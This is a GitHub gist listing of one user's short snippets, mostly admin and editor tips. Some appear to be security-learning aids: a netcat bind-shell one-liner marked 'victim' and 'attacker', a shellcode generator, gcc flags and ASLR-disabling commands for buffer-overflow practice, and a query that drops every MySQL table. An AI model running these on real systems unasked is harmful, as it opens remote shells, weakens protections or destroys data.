Edoardo Vignati EdoardoVignati
EdoardoVignati
/ dropMysqlTables.txt
Last active
March 20, 2019 14:33
DELETE all tables in a database using MySQL
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Just copy the following lines changing [databasename] and execute it. | |
| SELECT CONCAT('DROP TABLE ', GROUP_CONCAT(table_name SEPARATOR ',')) | |
| AS delete_stmt INTO @query | |
| FROM information_schema.tables WHERE table_schema = '[databasename]'; | |
| PREPARE stmt_drop FROM @query; | |
| EXECUTE stmt_drop; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Open the web server config file: | |
| ------------------------------------- | |
| $ sudo vi /etc/apache2/apache2.conf | |
| Add (or edit) this line to hide apache info: | |
| ----------------------------------------------- | |
| ServerSignature Off | |
| Add (or edit) this line to hide PHP | |
| verion in HTTP response header : |
EdoardoVignati
/ classicSaveFileInVim.txt
Last active
August 22, 2019 16:11
Bind CTRL+s to save in vim
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Disable ctrl-s of terminal. Add the folowing line to ~/.bashrc | |
| stty stop undef | |
| ## Copy the following lines in ~/.vimrc | |
| nnoremap <c-s> :w<CR> | |
| inoremap <c-s> <Esc>:w<CR> | |
| vnoremap <c-s> <Esc>:w<CR> | |
| ## If you don't want to add these lines, remember that you | |
| ## can exit from freezed terminal (ctrl-s) using ctrl-q |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # On victim machine | |
| mkfifo /tmp/mypipe; cat /tmp/mypipe|/bin/bash 2>&1|nc -l 4499 >/tmp/mypipe | |
| # On attacker machine | |
| nc -nv VICTIM-IP 4499 |
EdoardoVignati
/ latex-image.tex
Last active
March 26, 2019 10:47
Useful LaTeX snippet to include a centered resizable image into documents
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| \usepackage{graphicx} | |
| \usepackage{float} | |
| \begin{figure}[H] | |
| \centering | |
| \makebox[\textwidth][c]{\includegraphics[width=1.0\textwidth]{/path/to/img}} | |
| \caption{Description}\label{fig:label} | |
| \end{figure} |
EdoardoVignati
/ pushgen.py
Last active
November 12, 2018 17:52
Shellcode helper. Generate push instructions, assembly code or the shellcode for execve - AT&T
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # This code allow you to generate the assembly instruction | |
| # for shellcodes with execve. Giving in input a command (ex /bin/sh) | |
| # it generates the corresponding push instructions in AT&T assembly. | |
| import sys | |
| import os | |
| list_ofcmd=[] | |
| def getCode(push_instr): |
EdoardoVignati
/ static-compilation.txt
Created
October 25, 2018 10:54
Compile with gcc in "static" mode for buffer overflow
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Compile in "static" mode (for buffer overflow) | |
| $ gcc -g -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 | |
| # -g : debug options | |
| # -fno-stack-protector : remove protections of the stack | |
| # -z execstack : set stack executable | |
| # -mpreferred-stack-boundary=2 : align stack pointer on dword boundary |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| int main(){ | |
| char *cmd[]={"/bin/sh", NULL}; | |
| execve(cmd[0], cmd, NULL); | |
| return 1; | |
| } |
EdoardoVignati
/ read.s
Created
October 25, 2018 07:24
Read from stdin and print input - AT&T assembly
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ################# | |
| # How to run # | |
| ################# | |
| # $ as --gstabs read.s -o read.o | |
| # $ ld read.o -o read | |
| # $ ./read | |
| ################ | |
| .text |
EdoardoVignati
/ disable-enable-ASLR
Last active
September 20, 2018 09:07
Disable/Enable ASLR (Address space layout randomization)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Disable # | |
| echo 0 | sudo tee /proc/sys/kernel/randomize_va_space | |
| # Enable # | |
| echo 2 | sudo tee /proc/sys/kernel/randomize_va_space |